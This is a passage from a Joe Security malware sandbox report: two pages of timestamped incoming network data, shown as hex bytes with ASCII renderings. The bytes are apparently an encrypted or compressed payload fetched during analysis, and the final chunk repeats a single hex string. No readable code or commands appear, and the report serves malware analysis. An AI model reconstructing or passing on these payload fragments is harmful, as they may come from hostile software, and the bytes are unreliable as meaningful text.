2018-05-07 12:49:53 UTC 192 IN Data Raw: 33 18 26 e4 37 34 30 3b 30 b0 57 66 37 6e 3c b6 3a 3b e4 33 b9 21 14 b8 3a 14 66 b4 68 be e3 32 11 e3 3a c5 e3 3a 51 30 b3 37 de e4 37 0d b7 3a e1 b1 67 5c 22 b4 35 dc e5 60 5b b8 3b 62 60 38 6d b4 73 b4 65 2e e3 32 62 e3 3a 55 ec b9 61 65 30 36 67 e7 1b 35 37 5e b1 37 73 e6 0a b8 b9 b7 6e 03 ea 2f 3a 62 01 55 b9 23 4b b4 6d b7 14 a1 be 6c ba d2 cb ec f6 6e f3 e4 63 6d 34 16 ef 3a 12 71 72 20 37 b4 1a b5 64 62 64 35 f8 66 8c d3 e9 31 f2 3f 9e e2 66 39 31 ee 7b 74 a8 28 08 7d e7 31 4e b0 31 0c e7 3c f0 2c 2c cb e3 31 6e e4 60 a2 4b 50 ec 67 1c ec 3c 6e bb e0 63 ae b3 34 f1 40 91 b1 66 81 37 b1 36 fc b2 61 ec e0 32 d1 e5 34 9c 3b e3 31 3e 35 8e af 3b f9 11 7a b0 3d 11 81 c7 36 5e c2 61 79 c0 61 d8 49 3b cd 67 cf 5b c0 63 1c c0 36 bf cd 33 a9 94 64 b4 d6 19 Data Ascii: 3&740;0Wf7n<:;3!:fh2::Q077:g\"5 [;b`8mse.2b:Uae06g57 7sn/:bU#Kmlncm4:qr 7dbd5f1?f91{t(}1N1<,,1n`KPg<nc4@f76a24;1>5;z=6 ayaI;g[c63d
2018-05-07 12:49:53 UTC 208 IN Data Raw: 0a ca b8 65 9e 05 b5 31 bb 94 f8 8a 67 f8 84 79 33 37 91 ef ca f5 d8 2b 12 31 9c ed 0b 89 6e a8 21 63 64 b3 e6 a3 8f 32 1a ec 00 64 5a ab 3b ab 73 60 3b 26 60 a1 c3 c5 32 ee a7 8f 26 97 36 a2 92 30 69 42 32 ad 95 35 41 66 f3 7c 38 a3 e4 d6 23 07 0f 81 3e a8 43 30 12 89 19 64 f6 61 ff 45 37 25 57 64 49 c8 bc 40 35 02 19 9a cf 07 63 c8 9a 6c 9b 37 1e 77 9b 37 d8 3b 33 65 6e 07 1e c9 bb 1a 35 25 50 44 9a 56 66 cc 66 74 d2 5a 2b 59 11 2e 44 79 17 6c 29 24 67 73 74 55 1a 42 70 07 19 0b 03 6c 59 06 47 01 bb 6b 4c 9d a2 bf 52 e6 f2 14 55 74 c3 cb 7a 35 b1 72 6b e3 d9 9d 76 4d 8c 7f 66 7c 48 64 20 34 38 70 45 3c 79 72 7c 75 bb a3 0d 0a 38 30 30 30 0d 0a 7c 7a 27 5e 71 ee 14 2b 22 7b 60 2b 63 a4 69 24 30 37 cf 09 34 70 99 7c 20 c7 0b 9d 57 08 5d 65 c3 49 64 72 97 Data Ascii: e1gy37+1n!cd2dZ;s ;&`2&60iB25Af|8#>C0daE7%WdI@5cl7w7;3en5%PDVfftZ+Y.Dyl)$gstUBplYGkLRUtz5rkvMf|Hd 48pE<yr|u8000|z' q+"{ +ci$074p| W]eIdr
TimestampkBytestransferred Direction Data
Copyright Joe Security LLC 2018 Page 67 of 149
2018-05-07 12:49:53 UTC 224 IN Data Raw: b8 32 ef 21 3c dc df 19 4c 31 64 c7 c7 14 0e 0f a6 63 10 29 b5 2f 90 69 6e cb 73 41 6e 5c 73 ce e0 e3 3a 8e e3 3d e1 28 3b cb e7 19 54 57 37 39 f1 44 76 ed 4a c0 b7 24 a2 63 34 38 98 42 98 bb 44 74 cf 3e 10 80 9c 44 d0 41 d1 64 42 34 5c ec 4e c0 99 71 98 35 97 bb 08 6c 6c 13 11 bf 21 34 5e b0 12 18 b5 2d 6c 37 b9 83 42 c8 5d c6 16 3e d0 63 39 67 58 4c 9a 10 35 3b d0 64 05 bd 42 d1 b2 f0 74 2c 37 41 d5 b9 20 cb 8c 0f a0 42 64 38 69 dc b0 94 66 0f 3e 13 ec 23 2d 6a ed 41 22 27 b8 71 66 98 b9 79 e7 d1 54 39 64 66 37 bf c6 b9 2b 67 8c 3d a1 22 79 50 81 b5 09 b5 70 aa c9 35 19 fb 13 0d b3 59 60 45 25 dc ef 21 36 1c 20 51 dd 75 66 10 73 36 39 b1 67 75 24 32 c7 54 37 52 79 cb 17 21 d6 76 77 0a f3 63 5d 6a e7 6b 99 65 15 0d 79 66 51 d3 77 38 b2 31 a3 62 38 83 31 Data Ascii: 2!<L1dc)/insAn\s:=(;TW79DvJ$c48BDt>DAdB4\Nq5ll!4 -l7B]>c9gXL5;dBt,7A Bd8if>#-jA"'qfyT9df7+g="yPp5Y`E%!6 Qufs69gu$2T7Ry!vwc]jkeyfQw81b81
2018-05-07 12:49:53 UTC 240 IN Data Raw: 39 62 30 cf 99 23 8b 63 74 73 39 ee 56 c9 22 64 63 cb b0 25 b4 34 5d 39 66 59 e3 66 30 67 86 64 9a 76 ac 78 3d 22 e3 f1 78 e0 32 37 26 b7 8f 31 34 63 39 36 6b 6e 8a 47 f3 13 36 0e 30 6f 1f d1 39 fa 24 22 88 35 c2 b9 e0 63 64 c6 c7 9d 33 68 d1 37 2b 6f 65 36 a0 34 f0 33 53 65 8b 3b 19 05 43 b1 a6 1a 19 64 5d 59 34 6a 8c be fd d4 33 74 60 9f c5 7a 3d ba 3e 3b 39 b7 32 64 a6 36 72 f1 37 33 d1 da 23 3b e1 a1 2b 30 e5 da d5 1c 37 66 6a 45 7e 47 13 37 5c 34 0d 68 e4 37 c7 d4 06 2c 39 18 cc 21 f6 b6 70 71 b2 e8 3f 95 20 34 82 69 f7 cd 99 9b dc f8 ee ac 30 1e a6 4e 57 04 f2 24 45 7d ec 38 50 6b a4 63 c6 84 a7 52 61 32 e8 bf b1 67 b2 64 9c 69 12 24 76 35 0d 0a 38 30 30 30 0d 0a 0c 65 cb a4 bf 99 4b d9 76 6a 77 5e de 9d 43 6a 8c 79 e1 29 e1 32 b9 6a 6e f4 6a 68 a0 Data Ascii: 9b0#cts9V"dc%4]9fYf0gdvx="x27&14c96knG60o9$"5cd3h7+oe643Se;Cd]Y4j3t`z=>;92d6r73#;+07fjE~G7\4h7,9!pq? 4i0NW$E}8PkcRa2gdi$v58000eKvjw Cjy)2jnjh
2018-05-07 12:49:53 UTC 256 IN Data Raw: 30 6d 3f a6 32 30 67 2d 61 30 68 ed c7 b9 70 b4 6d 33 ed 46 3c 8a c8 b8 38 34 00 ef 5f 6a 47 29 69 3a 29 10 76 b8 a4 84 31 5c ba d5 14 70 37 6f d9 a0 56 65 dc 3f 77 34 66 73 ef fe d0 cc 04 18 02 34 c8 40 7a 65 30 5b 32 30 2d 36 0b 89 31 25 a3 35 42 9b 21 22 cf 29 2f 91 05 8e 57 34 05 f4 3b 63 24 63 fa 6a 64 b5 78 3c 60 45 4e 56 48 b0 f1 72 3c 34 b0 78 51 81 f3 74 46 6c 62 bf 47 38 20 33 84 65 0f 20 bb b5 94 62 f4 38 b8 1c 15 3c e5 dc d2 24 6b d6 75 b1 32 3d 89 02 27 3b 50 69 75 36 6a 34 e4 67 37 44 11 d9 ca 74 b4 36 76 36 8c 67 7c ae 3a 7a a5 3d 88 e5 31 dc 0d cd 31 0c 12 66 29 44 05 39 31 ee 6e 38 69 d3 37 62 07 6e ba 48 60 f6 10 75 30 3b d2 71 21 c8 3f 17 6c ec 33 63 be 41 2e 3a 8b 67 23 65 bc 9a 62 10 27 9c 33 1d 65 3b d6 39 76 48 a0 1d 66 48 c7 75 13 Data Ascii: 0m?20g-a0hpm3F<84_jG)i:)v1\p7oVe?w4fs4@ze0[20-61%5B!")/W4;c$cjdx<`ENVHr<4xQtFlbG8 3e b8<$ku2=';Piu6j4g7Dt6v6g|:z=11f)D91n8i7bnH`u0;q!?l3cA.:g#eb'3e;9vHfHu
2018-05-07 12:49:54 UTC 272 IN Data Raw: 68 65 60 63 66 bd 1d 11 33 9c 81 65 62 39 62 65 08 cc 15 66 bf cc 13 b2 37 71 a4 c5 f5 34 7b f3 a4 23 84 3a 68 8a d0 fd b9 36 eb a9 24 33 1c 71 35 e3 7f 25 ca 64 e9 67 34 74 0c 64 67 dc 6d 82 31 fa 01 64 cb 35 fa b7 1b 43 64 4e 0b 62 ef 7e 1d bf 7e c8 ed 3a 63 b9 db 7a b2 64 50 eb 95 65 c4 bf 27 60 bd 71 cf b4 31 35 f7 ed 27 bd 67 30 ec 63 6c b3 75 9a e1 f1 4c d7 3b cb 23 ca e3 9f 0b 25 19 17 23 f4 9d 13 17 dc 81 84 00 6d 77 b0 6f 15 ed 18 17 14 3e c3 65 bb 7f f8 bb 82 9d 67 ba 38 f3 33 46 61 03 42 7e e8 69 69 6b bc b0 ee 53 63 6f 11 31 0f 37 78 29 44 59 30 bc 44 26 b4 e0 95 10 3b b1 34 68 5a 3a 30 47 32 66 34 ea 43 20 5a 78 75 77 67 17 63 73 36 ef 35 20 3a 0e 39 34 71 0d 0a 38 30 30 30 0d 0a 65 86 39 2c b5 54 69 43 64 bb 58 72 64 f8 4d cb 7b b4 7e f5 e8 Data Ascii: he`cf3eb9bef7q4{#:h6$3q5%dg4tdgm1d5CdNb~~:czdPe' q15'g0cluL;#%#mwo>eg83FaB~iikSco17x)DY0D&;4hZ:0G2f4C Zxuwgcs65 :94q8000e9,TiCdXrdM{~
2018-05-07 12:49:54 UTC 288 IN Data Raw: 15 20 66 6c dc 0b c7 1a 20 13 74 7d 38 b1 a1 e4 43 50 bf 9a 7b 62 7a 2c 4d 3b 02 20 6f 46 25 33 69 33 16 75 88 3d eb 39 17 34 76 e7 48 10 27 39 45 6d 26 35 17 4e f0 dc 64 90 10 3b 61 66 11 7b 8b 30 bb 6a 79 de 91 e3 df 27 38 10 7c c8 61 ac 23 77 96 f1 17 25 33 09 27 f7 8c f7 87 2a bd cc 60 a2 6f 20 7a 66 a2 7e 26 34 db 26 be f6 70 68 69 d1 3c 10 75 b8 26 1b 17 e6 c2 69 5c 54 d7 61 d9 3d 7a 01 05 71 8c 14 e6 1e 74 3d 28 31 33 46 21 44 33 50 18 3e 43 5b 3f 3b d0 dd a2 0f 64 0f 11 35 86 7f 08 6d 6e b9 be 4c 68 0a 42 76 c6 33 f5 7a 6c 28 34 82 24 61 bb 41 b2 a4 5f 0e 6c b5 b9 d3 3b 79 09 3b f3 64 53 33 e6 de 41 33 5d 21 33 d8 08 26 36 64 34 41 60 db e6 3d a8 62 5f ff 36 b1 56 44 66 1d b3 2f 22 32 00 85 67 6e 00 34 46 64 c3 16 70 f9 a6 23 c9 68 24 62 5d f4 25 Data Ascii: fl t}8CP{bz,M; oF%3i3u=94vH'9Em&5Nd;af{0jy'8|a#w%3'*`o zf~&4&phi<u&i\Ta=zqt=(13F!D3P>C[?;d5mnLhBv3zl(4$aA_l;y;dS3A3]!3&6d4A`=b_6VDf/"2gn4Fdp#h$b]%
2018-05-07 12:49:54 UTC 304 IN Data Raw: 87 b7 df be 5e 37 39 79 30 b9 21 ee 2a b9 60 64 33 35 46 ef 25 67 bc 60 11 31 5f a5 61 63 bf 61 95 ea 64 65 cc eb 21 c0 45 37 ba 34 3b ce fa 63 60 09 39 9a 63 4c 6e ec 76 dc ef 31 d8 24 df 81 01 33 e4 0b 3b 34 bd 34 95 ea 11 d8 13 17 8c b3 39 ce ba 49 82 2d 1e dd db 63 3a ee 3e cd 59 18 d7 3b 62 eb 9a 34 52 45 38 0a 11 86 af 3b b5 97 e5 61 a5 40 b3 a1 24 29 39 63 65 bd 23 ee ea 64 ec 63 d1 c0 50 3b 62 ec 7e e4 6e e9 7c 35 76 18 71 35 ed 3b 37 e0 bd 6c 61 ea 31 f4 0b 66 b6 80 39 38 73 c3 15 16 23 31 0b ab 4d 3c 09 39 ef 20 33 c8 36 35 cb 41 c7 d1 de 33 f9 26 a3 69 ca b7 a1 73 e1 28 f8 eb 21 34 b9 74 f0 dc 78 35 21 06 71 60 11 9a 16 c1 9d 10 33 d8 99 11 dc 63 61 d1 46 30 64 4e 34 71 26 64 ee 60 0d 0a 38 30 30 30 0d 0a 67 38 7d b2 34 d0 9f 18 31 34 66 bd 20 Data Ascii: 79y0!*`d35F%g`1_acade!E74;c`9cLnv1$3;449I-c:>Y;b4RE8;a@$)9ce#dcP;b~n|5vq5;7la1f98s#1M<9 365A3&is(!4tx5!q`3caF0dN4q&d`8000g8}414f
2018-05-07 12:49:54 UTC 320 IN Data Raw: 4b 78 5d 1a 60 41 b7 37 ba 71 3c ef b2 78 a6 35 61 8a 51 18 16 ef 68 a9 b0 b9 32 e5 66 05 9c b8 4d c3 b0 2d 65 61 51 63 80 31 ef 2c 64 bf 71 f1 65 ba e9 87 0a bd 77 d4 62 82 6b 1c 03 a5 04 08 bc 68 33 30 8d 6b 68 f2 32 d2 29 ee f1 a7 16 6e 00 f4 66 e4 4a 67 36 4c 29 66 8f 64 3d 90 36 39 0f 62 e9 7d 98 12 34 d0 55 a7 83 1d 76 62 72 3f 0b ab 74 c5 ea 1b 66 12 22 e0 63 36 77 14 be 78 6d da 6d 55 32 bd 4e 3c 39 e8 e9 79 3e e8 65 04 b9 34 40 3f 69 80 a3 b8 75 f7 38 d5 1f d2 69 e8 4e a0 8e c2 37 24 48 19 30 b0 19 f2 34 b4 37 37 55 fd a4 39 a4 14 6e 50 b2 c1 16 d4 43 f9 33 3c bb ee 98 6a 08 f0 62 60 b0 f5 65 5f 79 a0 be db bc 10 f1 18 3e bf 93 34 74 4f d5 34 38 17 36 01 74 94 4e 79 ed b4 f6 20 3e 05 b0 20 e3 b0 70 4d e3 3b d0 36 2b c4 03 e0 e2 97 37 4f 7f dc 87 Data Ascii: Kx]`A7q<x5aQh2fM-eaQc1,dqewbkh30kh2)nfJg6L)fd=69b}4Uvbr?tf"c6wxmmU2N<9y>e4@?iu8iN7$H0477U9nPC3<jb`e_y>4tO486tNy > pM;6+7O
2018-05-07 12:49:54 UTC 336 IN Data Raw: bf a6 e7 a4 66 bf d4 b0 38 8a f0 c5 63 59 e9 af db ed d7 74 15 b4 05 ba 35 8e a0 66 3e 34 bf 71 91 1d 64 70 d3 61 ef 6d d5 cb 46 24 92 bd e4 fd 00 62 b2 28 9f 39 e9 51 bb 66 99 12 30 dc 27 33 a7 30 64 07 26 f4 43 38 65 e8 22 3c b3 2f 90 b8 05 b4 32 34 12 26 9c 74 cc a3 13 61 58 be 73 61 4f f0 8d 6c 52 6c bc 7f 2d 00 6a 21 36 6b ea 3b e8 67 eb f0 a9 67 65 b5 69 cb 0a 36 f1 54 60 2e bd 27 39 6f ee 3f d5 64 34 b4 78 b4 cb 41 cf f8 b1 d3 66 ef 36 dc dd 97 54 05 e8 b1 3e 52 6b 69 a9 41 26 bf 04 30 e7 ba bf f2 3b ec 7f b8 9d 87 33 34 38 e7 4b 74 37 4c 28 ba 65 24 38 bf 7b cc 5e 22 08 46 38 69 0c 2c f7 70 33 dc e2 63 63 3f 69 73 53 33 33 a0 6e 45 66 4c 64 02 a5 6e 17 6a ba 6d 40 6a 37 41 6f cb 13 6b 37 d0 d9 e3 c4 18 c6 42 0d 0a 38 30 30 30 0d 0a 3f 67 8e ee e3 Data Ascii: f8cYt5f>4qdpamF$b(9Qf0'30d&C8e"</24&taXsaOlRl-j!6k;ggei6T .'9o?d4xAf6T>RkiA&0;348Kt7L(e$8{ "F8i,p3cc?isS33nEfLdnjm@j7Aok7B8000?g
2018-05-07 12:49:54 UTC 352 IN Data Raw: b0 f6 72 8c 36 60 b7 02 5b 31 34 ed f5 dc 34 c3 e5 7f ef c8 bd 94 3d 61 39 40 76 bf 28 26 e8 70 20 67 02 a3 e3 c0 24 45 ba 75 76 60 df 14 77 7d 2d ba 2c 46 0c 94 f8 40 63 e8 a5 b8 24 91 64 3c 39 3f 0a 44 46 43 65 ba 7e 63 19 ec 2b 19 9d 13 2f 67 66 8c 2f 6d c9 c6 67 62 8c 60 23 b4 37 34 5a e2 2f 34 38 60 34 38 39 6b 6d f7 5c 26 e3 2e c8 63 02 1e 67 b0 1f 99 4e 1a 62 ef c3 35 51 7a 39 32 a2 ed 33 74 3a b4 77 64 34 d0 76 4c 64 38 39 6d b6 cb 69 b9 aa 29 30 63 39 65 04 38 5c a3 23 0f 66 27 30 48 e0 b8 52 3d 9b 64 ca 34 56 f7 8d 68 b5 38 38 32 0e 3a 66 0d b2 25 9e 76 71 4f 20 31 53 45 3b 79 e5 ec 76 c4 66 ef 77 3c bc 74 c1 bc 50 66 36 b7 48 30 65 16 6b c7 38 54 37 d0 b2 6c cd cb e5 36 45 31 69 3a d2 79 e8 74 62 99 0a 79 9e 19 39 bf 7a 39 c5 bc 58 67 92 91 93 Data Ascii: r6 [144=a9@v(&p g$Euvw}-,F@c$d<9?DFCe~c+/gf/mgb`#74Z/48`489km\&.cgNb5Qz923t:wd4vLd89mi)0c9e8\#f'0HR=d4Vh882:f%vqO 1SE;yvfw<tPf6H0ek8T7l6E1i:ytby9z9Xg
TimestampkBytestransferred Direction Data
Copyright Joe Security LLC 2018 Page 68 of 149
2018-05-07 12:49:54 UTC 368 IN Data Raw: 31 74 b3 cd a6 44 63 3c db 62 79 ef 6b b9 83 e5 f3 b4 9f e4 40 c1 74 e8 13 f1 81 e3 ec 3b b8 13 45 61 24 25 a8 a1 fd 52 3c 04 00 7d 6f 33 24 2d a3 97 09 60 52 79 e6 7a be 38 f8 25 05 31 be 75 15 29 ef f6 47 c4 37 94 62 ea 60 a6 b2 72 24 b8 3b ce f7 31 76 b6 81 f1 b0 99 38 a5 66 b3 b2 4f 27 aa ee 70 5e 3f 75 3f eb 70 62 a4 e7 36 67 2a 65 6a a4 66 90 63 94 34 1d 40 79 df e6 77 50 ce b5 b8 47 27 63 21 c2 7d 3c 82 62 63 04 2c 27 a9 30 b1 44 19 23 64 c9 00 db 13 78 28 24 8a eb 3d 7d 17 47 31 21 36 58 ca 4c b6 02 9e 1e 2a 67 85 31 14 26 47 20 1d 73 1d 21 31 e7 1a 13 24 36 4b dd 95 24 7c 1c 46 66 4c 6a e6 33 4a e8 7a 31 34 51 7e 60 60 47 46 79 65 2e 36 76 f5 31 1f ff 3a 7d 15 78 ce 66 dc 04 ff 60 ad a4 3d 28 a2 61 1a 29 54 1a 10 e3 f6 f3 39 20 1c 0d 0a 38 30 30 Data Ascii: 1tDc<byk@t;Ea$%R<}o3$- Ryz8%1u)G7b r$;1v8fO'p ?u?pb6g*ejfc4@ywPG'c!}<bc,'0D#dx($=}G1!6XL*g1&G s!1$6K$|FfLj3Jz14Q~` GFye.6v1:}xf =(a)T9 800
2018-05-07 12:49:54 UTC 384 IN Data Raw: 44 3c 0c 74 dc 36 fd 39 1e ba 29 72 bc 43 3e 34 ee 26 6c bb fc 6e 8c c4 39 0f cc cb 8d 72 9c 46 34 73 53 61 8b a1 62 6b 6a df 2c 25 b4 58 5d 38 b2 f1 61 66 5f c8 f6 5e 64 34 0e 26 6e 60 2e 38 21 b4 00 fd 27 bd 94 d9 f9 63 20 ec 62 59 27 75 b2 6c 20 8c 42 34 2c 39 b2 f5 4c ed 42 24 dd 3b 66 e3 6c b9 2b b9 27 d0 cd 08 cc 14 99 6f e8 64 c4 63 3e 8d 57 7b 30 e5 a1 61 9a 8c 18 b6 34 dd 24 b1 37 61 b5 4e ea b7 ce 20 8c 0b 89 62 45 b3 6c d4 33 7c e6 3b 88 b0 17 6a 39 39 17 3f 62 3a 39 41 75 0e 38 34 5d b9 f0 b0 13 4d df b8 95 35 67 a8 3b 66 63 ab a7 6d b2 24 df b7 8a 76 e3 67 63 50 e2 65 58 fa eb 38 cb bd 3b 90 34 bd 6a c9 b8 6c 98 69 b3 34 49 35 65 63 ef 75 30 5b 44 61 3d 3b b7 47 e6 33 6c 87 30 73 ba 8f 17 6f 35 6a b7 36 68 e4 32 b7 dd 1d 45 39 2e 76 7d 3b b3 Data Ascii: D<t69)rC>4&ln9rF4sSabkj,%X]8af_ d4&n .8!'c bY'ul B4,9LB$;fl+'odc>W{0a4$7aN bEl3|;j99?b:9Au84]M5g;fcm$vgcPeX8;4jli4I5ecu0[Da=;G3l0so5j6h2E9.v};
2018-05-07 12:49:54 UTC 400 IN Data Raw: 63 8c 39 98 c7 32 d6 92 34 6f b3 21 7d 33 65 a5 37 38 a6 60 3c 72 0c 4c 11 cd 18 bc dc 35 d7 34 18 25 64 0b ea ef 60 26 01 64 35 34 69 a3 a1 b2 f2 65 b4 69 63 0b 59 28 cf bd 33 80 4b 34 22 b2 f9 1a b7 ed 6a d0 36 be 79 7a ec 21 79 ef 78 38 33 0f 6e c8 18 d9 e3 09 30 63 4c 6d e6 cf 1c 61 f5 3c 26 9b 34 a5 3d 74 c5 f7 20 66 36 23 37 cb 20 93 ef 7d 38 92 e7 7d cd 2c 08 73 6e 02 6c bd 20 4b c6 05 22 bb 79 81 b1 a1 16 70 92 e5 26 39 41 68 3d 3f 06 b6 33 45 26 32 85 68 c0 94 23 1a 29 75 93 0f ed 2e 17 4f 63 43 bf f2 c7 c3 9d 74 16 41 17 34 17 bf 37 47 b9 cd 8c f7 f7 1e 67 b9 d6 22 72 f0 d0 9e ff ea 1b 41 26 f4 4f 26 e7 25 58 d7 18 6b 9f 39 60 56 c5 72 64 8f 64 12 cb 39 bc 7c 98 37 97 bf 3e cb 14 6b 44 05 45 a3 0c 5a c9 05 7b c2 12 24 77 32 41 44 d1 77 a9 29 61 Data Ascii: c924o!}3e78`<rL54%d`&d54ieicY(3K4"j6yz!yx83n0cLma<&4=t f6#7 }8},snl K"yp&9Ah=?3E&2h#)u.OcCtA47Gg"rA&O&%Xk9`Vrdd9|7>kDEZ{$w2ADw)a
2018-05-07 12:49:54 UTC 416 IN Data Raw: 3a 20 8e 34 5e 27 15 ac 20 61 65 76 34 26 22 3c ee 2c 8c 18 63 2f a8 b3 76 1c 3f bd 2b d6 6c 3b f0 66 5f e4 e3 71 60 e5 33 dd 99 91 b6 2d fe 69 28 02 ad e6 32 d3 97 54 c1 83 08 ac 67 a6 16 3e e1 d5 33 6b 62 84 63 67 fc d2 39 54 64 ed 52 62 17 06 61 b8 2d 08 30 a4 a9 e3 67 52 30 fc dd be 82 42 56 29 6a 0b 56 98 d6 54 01 65 d9 f7 62 31 b3 a0 dd 36 09 73 89 81 70 e7 42 b4 34 63 64 53 77 70 77 2f 36 64 34 5e 2c e8 11 f0 b3 6d fd 98 12 dc a8 d4 66 46 eb d8 60 80 33 64 f3 1e e1 a6 e7 63 35 0c a6 71 e3 1e 2b d0 66 2c dc fb d5 6c 61 4d 34 fa 2f 23 61 48 00 b6 83 35 8f 4d 2c 11 a3 a2 38 d4 5a 4b c5 8e d2 d0 66 eb 89 34 64 51 ac 31 64 66 dc e6 36 bf 3e 87 ef 7d c4 51 ad 38 d1 d7 93 ca 99 bd 16 c9 10 e8 67 61 e8 f1 62 ed db e7 67 64 08 cb 41 fd ba 44 98 ed 37 ec 5c Data Ascii: : 4 ' aev4&"<,c/v?+l;f_q`3-i(2Tg>3kbcg9TdRba-0gR0BV)jVTeb16spB4cdSwpw/6d4 ,mfF`3dc5q+f,laM4/#aH5M,8ZKf4dQ1df6>}Q8gabgdAD7\
2018-05-07 12:49:54 UTC 432 IN Data Raw: 38 af 32 be 67 74 03 c1 f2 ed 78 65 93 7b 61 65 66 36 dd 65 d9 34 d8 39 19 af 65 33 f7 35 6c f6 f6 71 64 7a 63 a2 10 61 3b 63 33 f7 12 75 66 73 3a 45 7b 64 d3 39 6c 64 4a 71 be 40 9b e2 13 b5 30 d8 a4 ef 24 94 34 01 67 5e 65 79 b5 4e a6 59 b1 c4 33 fa a4 37 36 33 3a a3 b0 7d 6f 38 fb a5 ae f5 fa 04 35 8c 37 39 c8 30 3d 64 7e 34 23 75 a7 47 b6 39 1c 60 da 7a 33 74 31 36 27 39 40 33 4f 62 1e 67 63 1a 62 29 32 0b 64 5a 36 1c 6f 3b c9 e9 40 51 e1 a7 ad 35 e5 52 66 09 3a 72 66 54 fd 7c 33 83 66 5f 62 14 32 6f 3b 67 15 79 29 30 31 aa 67 94 34 1c 07 3b 01 f1 a5 3a 77 f5 75 36 4f 2b a4 1b 65 20 25 a6 fb 8c de 34 ee 02 61 1e 70 63 31 67 f1 79 64 25 64 34 ff 65 e6 34 f6 17 99 31 64 c3 36 82 35 33 67 d5 6e 3b ef f1 a4 ee 70 6c 31 11 67 36 50 33 cf 62 d3 65 06 38 e2 Data Ascii: 82gtxe{aef6e49e35lqdzca;c3ufs:E{d9ldJq@0$4g eyNY3763:}o85790=d~4#uG9`z3t16'9@3Obgcb)2dZ6o;@Q5Rf:rfT|3f_b2o;gy)01g4;:wu6O+e %4apc1gyd%d4e41d653gn;pl1g6P3be8
2018-05-07 12:49:54 UTC 448 IN Data Raw: 13 11 20 17 e3 43 67 44 5f 54 07 d7 7f 14 55 06 3c c1 24 38 4d 0c 55 42 0a 5a 5a 24 08 40 02 5d 50 24 1c 16 4e 2d 11 0d 73 0b 43 94 60 51 43 50 31 5d 15 15 68 34 13 47 39 42 c1 38 38 2d 17 7d 88 bd 13 04 e6 4e 46 49 10 4b 1c 10 c3 31 4a 65 1e 5e 36 2f 5a 96 63 39 1c f2 e5 0c 47 24 64 51 06 0c e4 73 c8 f3 6d c8 0f 52 41 35 3c 16 05 43 5f 03 54 45 34 78 2e c6 b8 25 60 64 54 34 77 19 11 31 00 f7 01 25 13 30 09 0f 96 50 1d 43 4a 09 0c a4 54 34 66 1b 93 35 15 10 ca 67 62 c9 6b 08 59 11 56 5c 83 8c 37 61 31 31 64 00 58 46 53 34 0c 04 0a 18 53 07 1d 18 39 57 5c 5a 15 42 11 50 59 63 57 11 43 5f 03 0c 5f 51 64 00 34 48 76 69 78 11 07 07 35 58 36 04 45 14 0d 4c 50 42 64 5e 50 5a 52 58 0f 4c 06 31 54 43 49 17 06 49 03 17 32 34 76 17 40 55 43 5c 5c 54 70 08 43 34 6a Data Ascii: CgD_TU<$8MUBZZ$@]P$N-sC`QCP1]h4G9B88-}NFIK1Je 6/Zc9G$dQsmRA5<C_TE4x.%`dT4w1%0PCJT4f5gbkYV\7a11dXFS4S9W\ZBPYcWC__Qd4Hvix5X6ELPBd PZRXL1TCII24v@UC\\TpC4j
2018-05-07 12:49:54 UTC 464 IN Data Raw: 31 cb 52 74 99 f0 39 d3 2c 82 29 1a 02 39 83 6b d1 2a 86 5a 55 2b 56 35 d4 37 f0 66 54 15 c9 81 1e 6b 9b b4 bc 3c 78 da 36 6b 40 44 99 57 7c c1 06 d1 d6 9a 82 6b 83 7a 52 34 07 2a 34 cb 82 08 ce 46 b8 8a c8 35 d7 55 71 c3 a2 c7 33 26 31 28 c6 30 74 5a 84 42 08 52 7a e3 c6 9a f7 29 9d 96 93 d4 16 85 d4 3b c0 99 74 ce 85 75 56 59 57 2a 62 82 3f d9 76 07 2b 11 42 fa cc b0 6e 64 42 ce d1 6c f7 f9 4a c6 9a ab af 0d 04 74 d5 02 56 69 50 3e 8d 69 54 d5 7b d5 e9 9c a1 77 da 42 05 28 18 b3 53 09 87 7d 02 3e d7 c6 18 9a 02 37 a1 04 2c 55 66 d1 41 05 c8 d8 13 d0 6b a5 d6 4e d7 3b 53 c2 85 c7 d9 6d 05 39 38 56 33 57 f2 c9 ff 4a 09 9c b1 be c9 5c 00 65 86 4f 4f 06 26 cb d6 17 d0 1e 85 63 d2 2b d7 34 84 ed 05 18 d9 69 67 59 08 d5 17 15 c6 f7 9c 76 5d c3 52 9a 10 b0 1a Data Ascii: 1Rt9,)9k*ZU+V57fTk<x6k@DW|kzR4*4F5Uq3&1(0tZBRz);tuVYW*b?v+BndBlJtViP>iT{wB(S}>7,UfAkN;Sm98V3WJ\eOO&c+4igYv]R
2018-05-07 12:49:54 UTC 480 IN Data Raw: 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 Data Ascii: 34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df746
